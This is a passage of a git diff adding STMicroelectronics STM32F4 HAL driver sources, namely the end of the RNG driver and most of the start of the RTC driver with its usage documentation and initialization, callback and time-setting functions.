(USE_HAL_RNG_REGISTER_CALLBACKS == 1) + /* Call registered Error callback */ + hrng->ErrorCallback(hrng); +#else + /* Call legacy weak Error callback */ + HAL_RNG_ErrorCallback(hrng); +#endif /* USE_HAL_RNG_REGISTER_CALLBACKS */ + + /* Clear the clock error flag */ + __HAL_RNG_CLEAR_IT(hrng, RNG_IT_CEI | RNG_IT_SEI); + + return; + } + + /* Check RNG data ready interrupt occurred */ + if (__HAL_RNG_GET_IT(hrng, RNG_IT_DRDY) != RESET) + { + /* Generate random number once, so disable the IT */ + __HAL_RNG_DISABLE_IT(hrng); + + /* Get the 32bit Random number (DRDY flag automatically cleared) */ + hrng->RandomNumber = hrng->Instance->DR; + + if (hrng->State != HAL_RNG_STATE_ERROR) + { + /* Change RNG peripheral state */ + hrng->State = HAL_RNG_STATE_READY; + /* Process Unlocked */ + __HAL_UNLOCK(hrng); + +#if (USE_HAL_RNG_REGISTER_CALLBACKS == 1) + /* Call registered Data Ready callback */ + hrng->ReadyDataCallback(hrng, hrng->RandomNumber); +#else + /* Call legacy weak Data Ready callback */ + HAL_RNG_ReadyDataCallback(hrng, hrng->RandomNumber); +#endif /* USE_HAL_RNG_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief Read latest generated random number. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval random value + */ +uint32_t HAL_RNG_ReadLastRandomNumber(RNG_HandleTypeDef *hrng) +{ + return (hrng->RandomNumber); +} + +/** + * @brief Data Ready callback in non-blocking mode. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @param random32bit generated random number. + * @retval None + */ +__weak void HAL_RNG_ReadyDataCallback(RNG_HandleTypeDef *hrng, uint32_t random32bit) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrng); + UNUSED(random32bit); + /* NOTE : This function should not be modified. When the callback is needed, + function HAL_RNG_ReadyDataCallback must be implemented in the user file. + */ +} + +/** + * @brief RNG error callbacks. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval None + */ +__weak void HAL_RNG_ErrorCallback(RNG_HandleTypeDef *hrng) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrng); + /* NOTE : This function should not be modified. When the callback is needed, + function HAL_RNG_ErrorCallback must be implemented in the user file. + */ +} +/** + * @} + */ + + +/** @addtogroup RNG_Exported_Functions_Group3 + * @brief Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Returns the RNG state. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval HAL state + */ +HAL_RNG_StateTypeDef HAL_RNG_GetState(RNG_HandleTypeDef *hrng) +{ + return hrng->State; +} + +/** + * @brief Return the RNG handle error code. + * @param hrng: pointer to a RNG_HandleTypeDef structure. + * @retval RNG Error Code + */ +uint32_t HAL_RNG_GetError(RNG_HandleTypeDef *hrng) +{ + /* Return RNG Error Code */ + return hrng->ErrorCode; +} +/** + * @} + */ + +/** + * @} + */ + + +#endif /* HAL_RNG_MODULE_ENABLED */ +/** + * @} + */ + +#endif /* RNG */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rtc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rtc.c new file mode 100644 index 000000000..00f9e4b03 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rtc.c @@ -0,0 +1,1903 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_rtc.c + * @author MCD Application Team + * @brief RTC HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Real Time Clock (RTC) peripheral: + * + Initialization and de-initialization functions + * + RTC Time and Date functions + * + RTC Alarm functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### Backup Domain Operating Condition ##### + ============================================================================== + [..] The real-time clock (RTC), the RTC backup registers, and the backup + SRAM (BKP SRAM) can be powered from the VBAT voltage when the main + VDD supply is powered off. + To retain the content of the RTC backup registers, backup SRAM, and supply + the RTC when VDD is turned off, VBAT pin can be connected to an optional + standby voltage supplied by a battery or by another source. + + [..] To allow the RTC operating even when the main digital supply (VDD) is turned + off, the VBAT pin powers the following blocks: + (#) The RTC + (#) The LSE oscillator + (#) The backup SRAM when the low power backup regulator is enabled + (#) PC13 to PC15 I/Os, plus PI8 I/O (when available) + + [..] When the backup domain is supplied by VDD (analog switch connected to VDD), + the following pins are available: + (#) PC14 and PC15 can be used as either GPIO or LSE pins + (#) PC13 can be used as a GPIO or as the RTC_AF1 pin + (#) PI8 can be used as a GPIO or as the RTC_AF2 pin + + [..] When the backup domain is supplied by VBAT (analog switch connected to VBAT + because VDD is not present), the following pins are available: + (#) PC14 and PC15 can be used as LSE pins only + (#) PC13 can be used as the RTC_AF1 pin + (#) PI8 can be used as the RTC_AF2 pin + + ##### Backup Domain Reset ##### + ================================================================== + [..] The backup domain reset sets all RTC registers and the RCC_BDCR register + to their reset values. The BKPSRAM is not affected by this reset. The only + way to reset the BKPSRAM is through the Flash interface by requesting + a protection level change from 1 to 0. + [..] A backup domain reset is generated when one of the following events occurs: + (#) Software reset, triggered by setting the BDRST bit in the + RCC Backup domain control register (RCC_BDCR). + (#) VDD or VBAT power on, if both supplies have previously been powered off. + + ##### Backup Domain Access ##### + ================================================================== + [..] After reset, the backup domain (RTC registers, RTC backup data + registers and backup SRAM) is protected against possible unwanted write + accesses. + [..] To enable access to the RTC Domain and RTC registers, proceed as follows: + (+) Enable the Power Controller (PWR) APB1 interface clock using the + __HAL_RCC_PWR_CLK_ENABLE() function. + (+) Enable access to RTC domain using the HAL_PWR_EnableBkUpAccess() function. + (+) Select the RTC clock source using the __HAL_RCC_RTC_CONFIG() function. + (+) Enable RTC Clock using the __HAL_RCC_RTC_ENABLE() function. + + + ##### How to use this driver ##### + ================================================================== + [..] + (+) Enable the RTC domain access (see description in the section above). + (+) Configure the RTC Prescaler (Asynchronous and Synchronous) and RTC hour + format using the HAL_RTC_Init() function. + + *** Time and Date configuration *** + =================================== + [..] + (+) To configure the RTC Calendar (Time and Date) use the HAL_RTC_SetTime() + and HAL_RTC_SetDate() functions. + (+) To read the RTC Calendar, use the HAL_RTC_GetTime() and HAL_RTC_GetDate() functions. + + *** Alarm configuration *** + =========================== + [..] + (+) To configure the RTC Alarm use the HAL_RTC_SetAlarm() function. + You can also configure the RTC Alarm with interrupt mode using the HAL_RTC_SetAlarm_IT() function. + (+) To read the RTC Alarm, use the HAL_RTC_GetAlarm() function. + + ##### RTC and low power modes ##### + ================================================================== + [..] The MCU can be woken up from a low power mode by an RTC alternate + function. + [..] The RTC alternate functions are the RTC alarms (Alarm A and Alarm B), + RTC wake-up, RTC tamper event detection and RTC time stamp event detection. + These RTC alternate functions can wake up the system from the Stop and + Standby low power modes. + [..] The system can also wake up from low power modes without depending + on an external interrupt (Auto-wake-up mode), by using the RTC alarm + or the RTC wake-up events. + [..] The RTC provides a programmable time base for waking up from the + Stop or Standby mode at regular intervals. + Wake-up from STOP and STANDBY modes is possible only when the RTC clock source + is LSE or LSI. + + *** Callback registration *** + ============================================= + + [..] + The compilation define USE_HAL_RTC_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Function HAL_RTC_RegisterCallback() to register an interrupt callback. + + [..] + Function HAL_RTC_RegisterCallback() allows to register following callbacks: + (+) AlarmAEventCallback : RTC Alarm A Event callback. + (+) AlarmBEventCallback : RTC Alarm B Event callback. + (+) TimeStampEventCallback : RTC TimeStamp Event callback. + (+) WakeUpTimerEventCallback : RTC WakeUpTimer Event callback. + (+) Tamper1EventCallback : RTC Tamper 1 Event callback. + (+) Tamper2EventCallback : RTC Tamper 2 Event callback. + (+) MspInitCallback : RTC MspInit callback. + (+) MspDeInitCallback : RTC MspDeInit callback. + [..] + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + [..] + Use function HAL_RTC_UnRegisterCallback() to reset a callback to the default + weak function. + HAL_RTC_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) AlarmAEventCallback : RTC Alarm A Event callback. + (+) AlarmBEventCallback : RTC Alarm B Event callback. + (+) TimeStampEventCallback : RTC TimeStamp Event callback. + (+) WakeUpTimerEventCallback : RTC WakeUpTimer Event callback. + (+) Tamper1EventCallback : RTC Tamper 1 Event callback. + (+) Tamper2EventCallback : RTC Tamper 2 Event callback. + (+) MspInitCallback : RTC MspInit callback. + (+) MspDeInitCallback : RTC MspDeInit callback. + + [..] + By default, after the HAL_RTC_Init() and when the state is HAL_RTC_STATE_RESET, + all callbacks are set to the corresponding weak functions : + examples AlarmAEventCallback(), WakeUpTimerEventCallback(). + Exception done for MspInit and MspDeInit callbacks that are reset to the legacy weak function + in the HAL_RTC_Init()/HAL_RTC_DeInit() only when these callbacks are null + (not registered beforehand). + If not, MspInit or MspDeInit are not null, HAL_RTC_Init()/HAL_RTC_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + [..] + Callbacks can be registered/unregistered in HAL_RTC_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_RTC_STATE_READY or HAL_RTC_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_RTC_RegisterCallback() before calling HAL_RTC_DeInit() + or HAL_RTC_Init() function. + + [..] + When The compilation define USE_HAL_RTC_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + @endverbatim + + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup RTC RTC + * @brief RTC HAL module driver + * @{ + */ + +#ifdef HAL_RTC_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup RTC_Exported_Functions RTC Exported Functions + * @{ + */ + +/** @defgroup RTC_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This section provides functions allowing to initialize and configure the + RTC Prescaler (Synchronous and Asynchronous), RTC Hour format, disable + RTC registers Write protection, enter and exit the RTC initialization mode, + RTC registers synchronization check and reference clock detection enable. + (#) The RTC Prescaler is programmed to generate the RTC 1Hz time base. + It is split into 2 programmable prescalers to minimize power consumption. + (++) A 7-bit asynchronous prescaler and a 13-bit synchronous prescaler. + (++) When both prescalers are used, it is recommended to configure the + asynchronous prescaler to a high value to minimize power consumption. + (#) All RTC registers are Write protected. Writing to the RTC registers + is enabled by writing a key into the Write Protection register, RTC_WPR. + (#) To configure the RTC Calendar, user application should enter + initialization mode. In this mode, the calendar counter is stopped + and its value can be updated. When the initialization sequence is + complete, the calendar restarts counting after 4 RTCCLK cycles. + (#) To read the calendar through the shadow registers after Calendar + initialization, calendar update or after wake-up from low power modes + the software must first clear the RSF flag. The software must then + wait until it is set again before reading the calendar, which means + that the calendar registers have been correctly copied into the + RTC_TR and RTC_DR shadow registers.The HAL_RTC_WaitForSynchro() function + implements the above software sequence (RSF clear and RSF check). + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the RTC peripheral + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_Init(RTC_HandleTypeDef *hrtc) +{ + /* Check the RTC peripheral state */ + if(hrtc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_RTC_HOUR_FORMAT(hrtc->Init.HourFormat)); + assert_param(IS_RTC_ASYNCH_PREDIV(hrtc->Init.AsynchPrediv)); + assert_param(IS_RTC_SYNCH_PREDIV(hrtc->Init.SynchPrediv)); + assert_param (IS_RTC_OUTPUT(hrtc->Init.OutPut)); + assert_param (IS_RTC_OUTPUT_POL(hrtc->Init.OutPutPolarity)); + assert_param(IS_RTC_OUTPUT_TYPE(hrtc->Init.OutPutType)); + +#if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) + if(hrtc->State == HAL_RTC_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hrtc->Lock = HAL_UNLOCKED; + + hrtc->AlarmAEventCallback = HAL_RTC_AlarmAEventCallback; /* Legacy weak AlarmAEventCallback */ + hrtc->AlarmBEventCallback = HAL_RTCEx_AlarmBEventCallback; /* Legacy weak AlarmBEventCallback */ + hrtc->TimeStampEventCallback = HAL_RTCEx_TimeStampEventCallback; /* Legacy weak TimeStampEventCallback */ + hrtc->WakeUpTimerEventCallback = HAL_RTCEx_WakeUpTimerEventCallback; /* Legacy weak WakeUpTimerEventCallback */ + hrtc->Tamper1EventCallback = HAL_RTCEx_Tamper1EventCallback; /* Legacy weak Tamper1EventCallback */ + hrtc->Tamper2EventCallback = HAL_RTCEx_Tamper2EventCallback; /* Legacy weak Tamper2EventCallback */ + + if(hrtc->MspInitCallback == NULL) + { + hrtc->MspInitCallback = HAL_RTC_MspInit; + } + /* Init the low level hardware */ + hrtc->MspInitCallback(hrtc); + + if(hrtc->MspDeInitCallback == NULL) + { + hrtc->MspDeInitCallback = HAL_RTC_MspDeInit; + } + } +#else + if(hrtc->State == HAL_RTC_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hrtc->Lock = HAL_UNLOCKED; + + /* Initialize RTC MSP */ + HAL_RTC_MspInit(hrtc); + } +#endif /* (USE_HAL_RTC_REGISTER_CALLBACKS) */ + + /* Set RTC state */ + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set Initialization mode */ + if(RTC_EnterInitMode(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state */ + hrtc->State = HAL_RTC_STATE_ERROR; + + return HAL_ERROR; + } + else + { + /* Clear RTC_CR FMT, OSEL and POL Bits */ + hrtc->Instance->CR &= ((uint32_t)~(RTC_CR_FMT | RTC_CR_OSEL | RTC_CR_POL)); + /* Set RTC_CR register */ + hrtc->Instance->CR |= (uint32_t)(hrtc->Init.HourFormat | hrtc->Init.OutPut | hrtc->Init.OutPutPolarity); + + /* Configure the RTC PRER */ + hrtc->Instance->PRER = (uint32_t)(hrtc->Init.SynchPrediv); + hrtc->Instance->PRER |= (uint32_t)(hrtc->Init.AsynchPrediv << 16U); + + /* Exit Initialization mode */ + hrtc->Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + + /* If CR_BYPSHAD bit = 0, wait for synchro else this check is not needed */ + if((hrtc->Instance->CR & RTC_CR_BYPSHAD) == RESET) + { + if(HAL_RTC_WaitForSynchro(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_ERROR; + + return HAL_ERROR; + } + } + + hrtc->Instance->TAFCR &= (uint32_t)~RTC_TAFCR_ALARMOUTTYPE; + hrtc->Instance->TAFCR |= (uint32_t)(hrtc->Init.OutPutType); + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + return HAL_OK; + } +} + +/** + * @brief DeInitializes the RTC peripheral + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @note This function doesn't reset the RTC Backup Data registers. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_DeInit(RTC_HandleTypeDef *hrtc) +{ + uint32_t tickstart = 0U; + + /* Set RTC state */ + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set Initialization mode */ + if(RTC_EnterInitMode(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state */ + hrtc->State = HAL_RTC_STATE_ERROR; + + return HAL_ERROR; + } + else + { + /* Reset TR, DR and CR registers */ + hrtc->Instance->TR = 0x00000000U; + hrtc->Instance->DR = 0x00002101U; + /* Reset All CR bits except CR[2:0] */ + hrtc->Instance->CR &= 0x00000007U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till WUTWF flag is set and if Time out is reached exit */ + while(((hrtc->Instance->ISR) & RTC_ISR_WUTWF) == (uint32_t)RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state */ + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + return HAL_TIMEOUT; + } + } + + /* Reset all RTC CR register bits */ + hrtc->Instance->CR &= 0x00000000U; + hrtc->Instance->WUTR = 0x0000FFFFU; + hrtc->Instance->PRER = 0x007F00FFU; + hrtc->Instance->CALIBR = 0x00000000U; + hrtc->Instance->ALRMAR = 0x00000000U; + hrtc->Instance->ALRMBR = 0x00000000U; + hrtc->Instance->SHIFTR = 0x00000000U; + hrtc->Instance->CALR = 0x00000000U; + hrtc->Instance->ALRMASSR = 0x00000000U; + hrtc->Instance->ALRMBSSR = 0x00000000U; + + /* Reset ISR register and exit initialization mode */ + hrtc->Instance->ISR = 0x00000000U; + + /* Reset Tamper and alternate functions configuration register */ + hrtc->Instance->TAFCR = 0x00000000U; + + /* If RTC_CR_BYPSHAD bit = 0, wait for synchro else this check is not needed */ + if((hrtc->Instance->CR & RTC_CR_BYPSHAD) == RESET) + { + if(HAL_RTC_WaitForSynchro(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_ERROR; + + return HAL_ERROR; + } + } + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + +#if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) + if(hrtc->MspDeInitCallback == NULL) + { + hrtc->MspDeInitCallback = HAL_RTC_MspDeInit; + } + + /* DeInit the low level hardware: CLOCK, NVIC.*/ + hrtc->MspDeInitCallback(hrtc); + +#else + /* De-Initialize RTC MSP */ + HAL_RTC_MspDeInit(hrtc); +#endif /* (USE_HAL_RTC_REGISTER_CALLBACKS) */ + + hrtc->State = HAL_RTC_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +#if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User RTC Callback + * To be used instead of the weak predefined callback + * @param hrtc RTC handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_RTC_ALARM_A_EVENT_CB_ID Alarm A Event Callback ID + * @arg @ref HAL_RTC_ALARM_B_EVENT_CB_ID Alarm B Event Callback ID + * @arg @ref HAL_RTC_TIMESTAMP_EVENT_CB_ID TimeStamp Event Callback ID + * @arg @ref HAL_RTC_WAKEUPTIMER_EVENT_CB_ID Wake-Up Timer Event Callback ID + * @arg @ref HAL_RTC_TAMPER1_EVENT_CB_ID Tamper 1 Callback ID + * @arg @ref HAL_RTC_TAMPER2_EVENT_CB_ID Tamper 2 Callback ID + * @arg @ref HAL_RTC_MSPINIT_CB_ID Msp Init callback ID + * @arg @ref HAL_RTC_MSPDEINIT_CB_ID Msp DeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_RegisterCallback(RTC_HandleTypeDef *hrtc, HAL_RTC_CallbackIDTypeDef CallbackID, pRTC_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hrtc); + + if(HAL_RTC_STATE_READY == hrtc->State) + { + switch (CallbackID) + { + case HAL_RTC_ALARM_A_EVENT_CB_ID : + hrtc->AlarmAEventCallback = pCallback; + break; + + case HAL_RTC_ALARM_B_EVENT_CB_ID : + hrtc->AlarmBEventCallback = pCallback; + break; + + case HAL_RTC_TIMESTAMP_EVENT_CB_ID : + hrtc->TimeStampEventCallback = pCallback; + break; + + case HAL_RTC_WAKEUPTIMER_EVENT_CB_ID : + hrtc->WakeUpTimerEventCallback = pCallback; + break; + + case HAL_RTC_TAMPER1_EVENT_CB_ID : + hrtc->Tamper1EventCallback = pCallback; + break; + + case HAL_RTC_TAMPER2_EVENT_CB_ID : + hrtc->Tamper2EventCallback = pCallback; + break; + + case HAL_RTC_MSPINIT_CB_ID : + hrtc->MspInitCallback = pCallback; + break; + + case HAL_RTC_MSPDEINIT_CB_ID : + hrtc->MspDeInitCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if(HAL_RTC_STATE_RESET == hrtc->State) + { + switch (CallbackID) + { + case HAL_RTC_MSPINIT_CB_ID : + hrtc->MspInitCallback = pCallback; + break; + + case HAL_RTC_MSPDEINIT_CB_ID : + hrtc->MspDeInitCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hrtc); + + return status; +} + +/** + * @brief Unregister an RTC Callback + * RTC callabck is redirected to the weak predefined callback + * @param hrtc RTC handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_RTC_ALARM_A_EVENT_CB_ID Alarm A Event Callback ID + * @arg @ref HAL_RTC_ALARM_B_EVENT_CB_ID Alarm B Event Callback ID + * @arg @ref HAL_RTC_TIMESTAMP_EVENT_CB_ID TimeStamp Event Callback ID + * @arg @ref HAL_RTC_WAKEUPTIMER_EVENT_CB_ID Wake-Up Timer Event Callback ID + * @arg @ref HAL_RTC_TAMPER1_EVENT_CB_ID Tamper 1 Callback ID + * @arg @ref HAL_RTC_TAMPER2_EVENT_CB_ID Tamper 2 Callback ID + * @arg @ref HAL_RTC_MSPINIT_CB_ID Msp Init callback ID + * @arg @ref HAL_RTC_MSPDEINIT_CB_ID Msp DeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_UnRegisterCallback(RTC_HandleTypeDef *hrtc, HAL_RTC_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hrtc); + + if(HAL_RTC_STATE_READY == hrtc->State) + { + switch (CallbackID) + { + case HAL_RTC_ALARM_A_EVENT_CB_ID : + hrtc->AlarmAEventCallback = HAL_RTC_AlarmAEventCallback; /* Legacy weak AlarmAEventCallback */ + break; + + case HAL_RTC_ALARM_B_EVENT_CB_ID : + hrtc->AlarmBEventCallback = HAL_RTCEx_AlarmBEventCallback; /* Legacy weak AlarmBEventCallback */ + break; + + case HAL_RTC_TIMESTAMP_EVENT_CB_ID : + hrtc->TimeStampEventCallback = HAL_RTCEx_TimeStampEventCallback; /* Legacy weak TimeStampEventCallback */ + break; + + case HAL_RTC_WAKEUPTIMER_EVENT_CB_ID : + hrtc->WakeUpTimerEventCallback = HAL_RTCEx_WakeUpTimerEventCallback; /* Legacy weak WakeUpTimerEventCallback */ + break; + + case HAL_RTC_TAMPER1_EVENT_CB_ID : + hrtc->Tamper1EventCallback = HAL_RTCEx_Tamper1EventCallback; /* Legacy weak Tamper1EventCallback */ + break; + + case HAL_RTC_TAMPER2_EVENT_CB_ID : + hrtc->Tamper2EventCallback = HAL_RTCEx_Tamper2EventCallback; /* Legacy weak Tamper2EventCallback */ + break; + + case HAL_RTC_MSPINIT_CB_ID : + hrtc->MspInitCallback = HAL_RTC_MspInit; + break; + + case HAL_RTC_MSPDEINIT_CB_ID : + hrtc->MspDeInitCallback = HAL_RTC_MspDeInit; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if(HAL_RTC_STATE_RESET == hrtc->State) + { + switch (CallbackID) + { + case HAL_RTC_MSPINIT_CB_ID : + hrtc->MspInitCallback = HAL_RTC_MspInit; + break; + + case HAL_RTC_MSPDEINIT_CB_ID : + hrtc->MspDeInitCallback = HAL_RTC_MspDeInit; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hrtc); + + return status; +} +#endif /* USE_HAL_RTC_REGISTER_CALLBACKS */ + +/** + * @brief Initializes the RTC MSP. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +__weak void HAL_RTC_MspInit(RTC_HandleTypeDef* hrtc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrtc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_RTC_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes the RTC MSP. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +__weak void HAL_RTC_MspDeInit(RTC_HandleTypeDef* hrtc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrtc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_RTC_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup RTC_Exported_Functions_Group2 RTC Time and Date functions + * @brief RTC Time and Date functions + * +@verbatim + =============================================================================== + ##### RTC Time and Date functions ##### + =============================================================================== + + [..] This section provides functions allowing to configure Time and Date features + +@endverbatim + * @{ + */ + +/** + * @brief Sets RTC current time. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sTime Pointer to Time structure + * @param Format Specifies the format of the entered parameters. + * This parameter can be one of the following values: + * @arg RTC_FORMAT_BIN: Binary data format + * @arg RTC_FORMAT_BCD: BCD data format + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_SetTime(RTC_HandleTypeDef *hrtc, RTC_TimeTypeDef *sTime, uint32_t Format) +{ + uint32_t tmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_FORMAT(Format)); + assert_param(IS_RTC_DAYLIGHT_SAVING(sTime->DayLightSaving)); + assert_param(IS_RTC_STORE_OPERATION(sTime->StoreOperation)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + if(Format == RTC_FORMAT_BIN) + { + if((hrtc->Instance->CR & RTC_CR_FMT) != (uint32_t)RESET) + { + assert_param(IS_RTC_HOUR12(sTime->Hours)); + assert_param(IS_RTC_HOURFORMAT12(sTime->TimeFormat)); + } + else + { + sTime->TimeFormat = 0x00U; + assert_param(IS_RTC_HOUR24(sTime->Hours)); + } + assert_param(IS_RTC_MINUTES(sTime->Minutes)); + assert_param(IS_RTC_SECONDS(sTime->Seconds)); + + tmpreg = (uint32_t)(((uint32_t)RTC_ByteToBcd2(sTime->Hours) << 16U) | \ + ((uint32_t)RTC_ByteToBcd2(sTime->Minutes) << 8U) | \ + ((uint32_t)RTC_ByteToBcd2(sTime->Seconds)) | \ + (((uint32_t)sTime->TimeFormat) << 16U)); + } + else + { + if((hrtc->Instance->CR & RTC_CR_FMT) != (uint32_t)RESET) + { + assert_param(IS_RTC_HOUR12(RTC_Bcd2ToByte(sTime->Hours))); + assert_param(IS_RTC_HOURFORMAT12(sTime->TimeFormat)); + } + else + { + sTime->TimeFormat = 0x00U; + assert_param(IS_RTC_HOUR24(RTC_Bcd2ToByte(sTime->Hours))); + } + assert_param(IS_RTC_MINUTES(RTC_Bcd2ToByte(sTime->Minutes))); + assert_param(IS_RTC_SECONDS(RTC_Bcd2ToByte(sTime->Seconds))); + tmpreg = (((uint32_t)(sTime->Hours) << 16U) | \ + ((uint32_t)(sTime->Minutes) << 8U) | \ + ((uint32_t)sTime->Seconds) | \ + ((uint32_t)(sTime->TimeFormat) << 16U)); + } + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set Initialization mode */ + if(RTC_EnterInitMode(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state */ + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + else + { + /* Set the RTC_TR register */ + hrtc->Instance->TR = (uint32_t)(tmpreg & RTC_TR_RESERVED_MASK); + + /* This interface is deprecated. To manage Daylight Saving Time, please use HAL_RTC_DST_xxx functions */ + hrtc->Instance->CR &= (uint32_t)~RTC_CR_BCK; + + /* This interface is deprecated. To manage Daylight Saving Time, please use 